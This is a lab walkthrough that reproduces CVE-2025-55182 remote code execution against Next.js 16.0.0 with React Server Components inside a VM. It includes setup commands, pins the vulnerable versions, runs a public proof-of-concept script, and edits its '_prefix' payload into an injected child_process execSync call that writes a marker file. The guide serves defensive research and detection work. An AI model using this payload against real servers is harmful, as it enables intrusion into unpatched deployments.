
Reproducible lab demonstrating CVE-2025-55182 Remote Code Execution against Next.js 16.0.0 with React Server Components, including external exploit execution and side-effect verification.
This document provides a complete and reproducible setup for demonstrating CVE-2025-55182 Remote Code Execution (RCE) against a vulnerable Next.js + React Server Components environment running inside a Multipass Ubuntu VM.
The exploit is executed from outside the VM, proving remote exploitability and preparing the environment for anomalous behavioral detection.
Source: https://github.com/ejpir/CVE-2025-55182-research
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs
Verify:
node -v
npm -v
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab
mkdir ~/react2shell-lab
cd ~/react2shell-lab
npx create-next-app@latest vulnerable-app
cd vulnerable-app
package.jsonEdit dependencies:
"dependencies": {
"next": "16.0.0",
"react": "19.1.0",
"react-dom": "19.1.0"
}
Reinstall packages:
rm -rf node_modules package-lock.json
npm install
Verify:
npm list react react-dom next
Expected:
[email protected]
[email protected]
[email protected]
npm run build
npm start
Expected output:
▲ Next.js 16.0.0
Local: http://localhost:3000
Network: http://10.X.X.X:3000

On another machine:
curl http://10.102.169.126:3000
You should receive the default Next.js HTML page.
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research
Find:
hostname: 'localhost',
Replace with:
hostname: '10.X.X.X',
With Next still running:
node test-simple.cjs
Expected in the Next.js terminal:
NON-CHUNKED-RCE
This confirms remote code execution via React Flight using the vulnerable versions.

The goal is to generate observable behavior (filesystem + process execution).
_prefix inside test-simple.cjsLocate:
"_prefix": "console.log('NON-CHUNKED-RCE');//"
Replace with:
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"
Note: require is not available in the execution context, but process.mainModule.require() is.
Ensure Next is running, then:
node test-simple.cjs
Check file creation:
ls -l /tmp/
You should see:
cve-2025-55182-syscall
This confirms functional RCE with side effects.

Patch:
React ≥ 19.2.1
Next.js ≥ 16.0.7